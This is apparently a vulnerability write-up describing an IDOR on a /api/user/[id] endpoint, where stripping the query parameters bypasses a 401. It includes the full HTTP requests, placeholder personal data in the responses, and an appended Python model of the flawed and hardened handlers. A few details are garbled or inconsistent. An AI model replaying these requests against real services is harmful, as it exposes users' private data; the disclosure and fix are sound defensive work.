IDOR bypassed 401 leading to a leak of personal data

NXR

📌 Brief Description

I found an Insecure Direct Object Reference (IDOR) vulnerability in the endpoint GET /api/user/[id]. The system initially returned 401 Unauthorized when another user's data was requested with certain parameters present. However, once those parameters were removed from the URL, the same endpoint returned a successful response and exposed the other user's personal data without any proper authorization.

๐Ÿ” Langkah Reproduksi

  1. Log in as ATTACKER (User A).

  2. I found the following request while browsing the profile section

    GET /api/user/12345?token=abc123xyz&include=profile,contacts,settings HTTP/1.1
    Host: target-website.com
    Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.9
    Connection: keep-alive
    Referer: https://target-website.com/dashboard

    This request returns the personal data of the ATTACKER's own account

    HTTP/1.1 200 OK
    Content-Type: application/json
    Cache-Control: no-store

    {
    "user_id": "1234567890",
    "username": "johndoe",
    "email": "johndoe@example.com",
    "password_hash": "$2b$12$EixZaYVK1fsbw1ZfbX3OXe.PxoEwFv0uQ1m07QzH2dq0WyP5fpGuK",
    "credit_card": { "number": "4111111111111111", "expiry": "12/25", "cvv": "123" },
    "social_security_number": "123-45-6789",
    "bank_account": { "account_number": "9876543210", "routing_number": "021000021" },
    "jwt_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
    "two_factor_secret": "JBSWY3DPEHPK3PXP"
    }

  3. Here I tried changing the ATTACKER's ID 12345 to the VICTIM's account ID 12346 to view the victim's personal data, and it turned out I could not get it → Response: 401 Unauthorized.

    HTTP/1.1 401 Unauthorized
    Content-Type: application/json
    WWW-Authenticate: Bearer realm="example", error="invalid_token", error_description="The access token is missing or invalid."

    { "error": "unauthorized", "message": "Authentication required or invalid credentials." }

  4. After that I tried removing every parameter from the request line, like so

    GET /api/user/12346 HTTP/1.1
    Host: target-website.com
    Cookie: session_id=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.fake.jwt.token; theme=dark; locale=en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.9
    Connection: keep-alive
    Referer: https://target-website.com/dashboard

  5. And it turned out this bypassed the 401!! I could see the VICTIM's personal data appear in the response

    {
    "user_id": "1234567890",
    "username": "albert",
    "email": "ablert@example.com",
    "password_hash": "$$2b$12$X5jVq3nySlDFG8WqQIwYQesJ2Rb6x9twQ4Q49gJLbYqRpItGmfP5C",
    "credit_card": { "number": "5111111111111113", "expiry": "10/28", "cvv": "124" },
    "social_security_number": "125-46-6889",
    "bank_account": { "account_number": "9276443211", "routing_number": "023000022" },
    "jwt_token": "eyJfhwefJHWHFWHjwgfhwjGEEJJRTRJWrjg...",
    "two_factor_secret": "JBSEIHWHFWEIOJWRTG"
    }

    *Jeder Duplicate
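The steps above point at one root cause: the ownership check only runs on the code path that handles the query parameters, so a bare `/api/user/<id>` request never reaches it. The following is an added example and is not code from the original post or from the target application. It models that broken handler next to a hardened one in Python, using constructed session, user and token data; the names `vulnerable_handler`, `hardened_handler`, `SESSIONS`, `USERS`, `VALID_TOKENS` and `replay` are assumptions for illustration, since the real backend is unknown.

```python
"""Added example (not the author's code nor the target site's): a toy model of
the authorization flaw described in the write-up, beside a hardened handler.

Assumptions not taken from the post: the server maps a session cookie to a
user id, keeps a per-user API token, and its vulnerable handler only performs
the ownership/token check inside the branch that handles query parameters.
"""
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed sample data, loosely following the ids used in the write-up.
SESSIONS = {"sess-attacker": "12345"}                 # session cookie -> user id
VALID_TOKENS = {"12345": "abc123xyz"}                 # user id -> API token
USERS = {
    "12345": {"user_id": "12345", "username": "johndoe", "email": "johndoe@example.com"},
    "12346": {"user_id": "12346", "username": "albert", "email": "albert@example.com"},
}


@dataclass
class Response:
    status: int
    body: dict = field(default_factory=dict)


def parse_request_target(target: str) -> tuple:
    """Split '/api/user/12346?token=x&include=a,b' into ('12346', {...})."""
    parts = urlsplit(target)
    user_id = parts.path.rstrip("/").rsplit("/", 1)[-1]
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return user_id, query


def vulnerable_handler(target: str, session_cookie: str) -> Response:
    """Reproduces the flaw: authorization runs only when query params exist."""
    requested_id, query = parse_request_target(target)
    if requested_id not in USERS:
        return Response(404, {"error": "not_found"})
    if query:
        # The ownership and token checks live here, and only here.
        caller = SESSIONS.get(session_cookie)
        if caller != requested_id or query.get("token") != VALID_TOKENS.get(caller):
            return Response(401, {"error": "unauthorized"})
    # A request with no query string never touches the checks above.
    return Response(200, USERS[requested_id])


def hardened_handler(target: str, session_cookie: str) -> Response:
    """Authenticate first, then authorize against the path id, unconditionally."""
    requested_id, _query = parse_request_target(target)
    caller = SESSIONS.get(session_cookie)
    if caller is None:
        return Response(401, {"error": "unauthorized"})
    # Object-level check on the path parameter itself; query params play no part.
    # Checking ownership before existence also avoids leaking which ids exist.
    if caller != requested_id:
        return Response(403, {"error": "forbidden"})
    if requested_id not in USERS:
        return Response(404, {"error": "not_found"})
    return Response(200, USERS[requested_id])


# The three requests from the write-up's steps 2, 3 and 4, all sent as ATTACKER.
WRITEUP_REQUESTS = [
    "/api/user/12345?token=abc123xyz&include=profile,contacts,settings",  # own data
    "/api/user/12346?token=abc123xyz&include=profile,contacts,settings",  # victim + params
    "/api/user/12346",                                                    # victim, no params
]


def replay(handler) -> list:
    """Return the status codes a handler gives for the three write-up requests."""
    return [handler(t, "sess-attacker").status for t in WRITEUP_REQUESTS]


if __name__ == "__main__":
    print("vulnerable:", replay(vulnerable_handler))  # [200, 401, 200]
    print("hardened:  ", replay(hardened_handler))    # [200, 403, 403]
```

The hardened version decides access from the session and the path id alone, before any parameter handling, so stripping parameters cannot route around it; it also returns 403 rather than 401 for a logged-in caller asking for someone else's record, which keeps "not authenticated" and "not permitted" distinguishable in logs. For detection, a 200 on `/api/user/<id>` where the session's user id differs from the path id is exactly the signal to alert on.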
